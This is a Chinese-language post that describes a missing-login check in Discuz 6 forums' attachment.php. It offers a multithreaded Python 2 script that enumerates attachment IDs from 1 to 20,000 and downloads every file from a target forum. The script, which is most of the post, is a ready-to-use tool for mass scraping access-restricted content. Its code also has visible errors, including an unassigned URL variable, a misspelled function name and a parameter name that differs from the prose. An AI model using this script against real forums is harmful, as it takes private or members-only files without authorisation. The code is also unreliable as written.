前段时间我下了个python脚本把emsky的附件全部下载了,之前是因为偶然发现emsky附件不登陆也能访问,直接访问一个url就行了。
后来发现大部分discuz6的论坛都有这个bug,我想是因为discuz6的attachment.php没有检测用户是否登陆。
所以,要下载一个附件,这样就行了:
【论坛url】+attachment.php?atid+【附件id】
当然还有一些论坛可能有点验证机制,比如附件下载页面还要再点一个url,但一般这样的url都是明文的,所以也不难。
顺便再丢一个通用的很挫的python脚本:
# -*- coding: gbk -*- import urllib, urllib2, cookielib
import os, time
import re
import thread
from os.path import basename
from urlparse import urlsplit URL_INDEX= #论坛主页
DIRNAME = "attdir" #下载目录
ID_START = 1 #起始附件标号
ID_END = 20000 #结束附件标号
DIR_NUM = 1000 #一个目录内放的文件数
AID_PLUS_FN = True
URLATT = URL_INDEX+"/attachment.php?aid=" id_i = ID_START def download(aid=0):
global workdir
try:
url = "%s%d"%(URLATT,aid)
r = urllib2.urlopen(url)
fileName = ""
if r.info().has_key('Content-Disposition'):
fileName = r.info()['Content-Disposition'].split('filename=')[1]
fileName = fileName.replace('"', '').replace("'", "")
elif r.url != url:
fileName = ibasename(urlsplit(r.url)[2])
if fileName <> "":
if AID_PLUS_FN == True:
fileName = "%08d_%s"%(aid,fileName)
fpath="%05d000"%(aid/DIR_NUM)
try:
os.chdir(workdir+"/"+fpath)
except:
os.mkdir(workdir+"/"+fpath)
os.chdir(workdir+"/"+fpath)
#print fileName,
if os.path.isfile(fileName):
#print "ignore"
pass
else:
f = open(fileName, 'wb')
f.write(r.read())
f.close()
#print "done"
else:
pass
except Exception,e:
print e def downloads(id_s,id_e):
global id_i
while id_i<=id_e:
download(id_i)
id_i = id_i+1
print "thread ok" if __name__ == '__main__':
global workdir
try:
os.chdir(DIRNAME)
except:
os.mkdir(DIRNAME)
os.chdir(DIRNAME)
workdir = os.getcwd()
print "start:%d\nend:%d\n"%(ID_START,ID_END)
for i in range(0,10):
thread.start_new_thread(downloads,(ID_START,ID_END))
while True:pass